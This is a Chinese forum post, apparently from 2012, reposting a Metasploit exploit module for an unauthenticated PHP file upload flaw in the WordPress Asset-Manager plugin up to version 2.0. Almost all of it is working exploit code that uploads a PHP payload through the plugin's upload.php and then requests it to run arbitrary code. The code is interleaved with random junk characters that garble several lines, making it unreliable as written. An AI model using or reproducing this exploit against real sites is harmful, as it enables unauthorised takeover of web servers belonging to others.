这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
7 v8 V0 g3 X. i9 M7 v M! O( b/ O/ m2 P" Z' g
##
- k# Q3 `" t) w6 a$ I# This file is part of the Metasploit Framework and may be subject to
2 h" d1 V" W x) @8 i( e: l; J2 n: y# redistribution and commercial restrictions. Please see the Metasploit3 @* w, U( m! p! Q; ^5 x3 D
# Framework web site for more information on licensing and terms of use. Y( `$ S v+ }% v, R# Z) b3 T0 y
# http://metasploit.com/framework/4 n( E; f8 b* h8 Y) u
##
8 g7 p: R/ Q& {9 d% c
9 m8 ~8 u7 Y9 T4 A' k+ rrequire 'msf/core'' K: N, ~) }: q- T
require 'msf/core/exploit/php_exe'! e5 E( b A7 L) w8 V0 v, n
$ f7 R/ b2 A& p6 p9 p
class Metasploit3 < Msf::Exploit::Remote7 ]: U: C+ w" h1 \
Rank = ExcellentRanking
2 `; E$ x3 X, Z1 v6 J J8 ~6 y3 f- B 8 |- N4 n Y) Q/ r; ~
include Msf::Exploit::Remote::HttpClient0 p1 d: A7 S" X: p
include Msf::Exploit: hpEXE
# Z: {3 ~" C; K: ^, W4 S$ \' B* M * }# K# T' k. r2 b' y
def initialize(info = {})# ^4 E6 Q4 M" e
super(update_info(info,
7 N4 f1 P- N4 L& A3 m. E" L 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
' z8 t2 o3 L4 k% k0 N% t5 l3 p' I 'Description' => %q{9 g0 h! f# D+ f' L4 O1 s
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress7 `/ G$ ]- h5 ^
plugin. By abusing the upload.php file, a malicious user can upload a file to a
. M. \$ A: y3 y. e' x. K+ a' z temp directory without authentication, which results in arbitrary code execution.
7 R& a/ i5 C6 }2 B" A% g7 j },
+ A9 y! n# @ w2 S# G 'Author' =>2 L" X6 F4 J! j+ R* c# ]/ I( u
[# U& t, {( k" ]; n1 }/ t3 [
'Sammy FORGIT', # initial discovery
" Y: {. P0 d# M6 N# }9 {8 ? 'James Fitts <fitts.james[at]gmail.com>' # metasploit module% e7 U; O* Y; a) s6 ]
],1 M1 {' t; Z% K% |
'License' => MSF_LICENSE,7 P K3 O% `* ?/ l* f9 x' L
'References' =>
& {9 p% I8 d* b% Q8 F7 B t( ? [
1 i* d; B- b+ e- ]! p% c [ 'OSVDB', '82653' ],* V5 c$ B- N9 M) P4 e5 P
[ 'BID', '53809' ],
( Z) M7 u L4 X2 r: Z [ 'EDB', '18993' ],( F& N$ d5 \1 Z, `! `- \/ C/ f
[ 'URL', 'http:// www.myhack58.com /' ]3 S% j& W- m9 r# B6 m+ T. y% j
],) B: _9 T4 V$ T
'Payload' =>
% T' L" o3 C8 v& c7 p6 N {
# y2 L8 Z G8 i 'BadChars' => "\x00",
# ]# I# C0 G, n2 o# X/ h },
. r) B4 Q F' R# u 'Platform' => 'php',, B* j- O U% ~9 x: S
'Arch' => ARCH_PHP,; @) g' C: t: g
'Targets' =>
8 ~; b c2 j0 r# ]" I& @ ? [1 [. ~. z2 P" P
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
3 Q/ ?6 \( [1 W: N: f* [ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]9 _4 V5 n7 |6 U( g6 Z
],7 a5 G( ^2 H, V7 f& K$ @5 ]$ C
'DefaultTarget' => 0,
, }) b0 h) \# v" j3 Y' w9 K( p; I 'DisclosureDate' => 'May 26 2012'))+ o6 s6 X3 b8 ~5 k! z7 H- K
# d1 |( r/ p- L ^. H
register_options(
: V8 n4 y) e( X* v6 X- p [: `* t$ ?( ^) d2 B& s/ I% ?- F
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
7 p0 ~1 `6 X* L' |* h0 u8 G$ x& o5 v: {2 [ ], self.class)
7 M' x+ y2 l& b; ?0 ]! @ end
2 u8 J+ r# a S, h% A- C/ |- a( H
2 E; \, z$ |2 J E- d def exploit
. k; I. N2 u' Z8 G& U M! {0 q uri = target_uri.path
6 j m" H% c* O+ ?; V# @# s uri << '/' if uri[-1,1] != '/') b1 L4 h& X1 V2 N/ K9 o
peer = "#{rhost}:#{rport}", ~ C1 _. Y3 f
payload_name = "#{rand_text_alpha(5)}.php"9 J# l; K1 f7 f7 F3 ~
php_payload = get_write_exec_payload(:unlink_self=>true)
! U7 i* M3 G' X; o 8 j" M& Z4 l! \
data = Rex::MIME::Message.new" |# Q+ m* X( D
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
3 [6 M# W( f4 f! K0 m4 s- j2 A post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')/ i$ D* i& E% B, J! o
$ `1 |2 S+ J4 R+ F( ? print_status("#{peer} - Uploading payload #{payload_name}"), z! u6 u/ M9 [1 e$ ~
res = send_request_cgi({0 k+ M0 P3 E' L( K
'method' => 'POST',- O, l( ? M5 _- E; y8 A6 s
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",8 s! j4 W$ v+ N7 ]: J7 D
'ctype' => "multipart/form-data; boundary=#{data.bound}",; l4 H/ @! f- L2 h# y5 V8 e6 s: @
'data' => post_data
! z/ m- k/ |9 n- _) e })6 y2 e [& L4 b0 B6 B" N n
; f' |; l9 y r9 L" \! K/ ?
if not res or res.code != 200 or res.body !~ /#{payload_name}/+ W9 f2 |% `3 \5 u. K
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
2 W$ T" m# l7 h$ F+ bend
2 C9 d- T5 U9 x ) v6 O% h$ N, g D( C. D5 _, ~& x
print_status("#{peer} - Executing payload #{payload_name}")
( r, D6 g, Q/ \; |2 S res = send_request_raw({; J) e' H& q. j& e- {8 L
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",2 c4 j) Q0 q" @( a' S' C
'method' => 'GET'+ ~/ s9 f' _7 X8 t3 ]: D6 J+ F, J9 J
})$ k1 U0 z; E# j/ }
6 d* _% w; v& d$ u) v if res and res.code != 2008 v& J9 S- j' | P1 R7 T
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% U9 M$ f' K0 O
end
/ U$ c9 ~" ? o) H end
1 ] v: C% i) s" q8 ]* `( Z$ ?end
5 E9 v7 H8 \1 H$ ` |
发表于 2012-12-31 09:22:33
收藏
支持
反对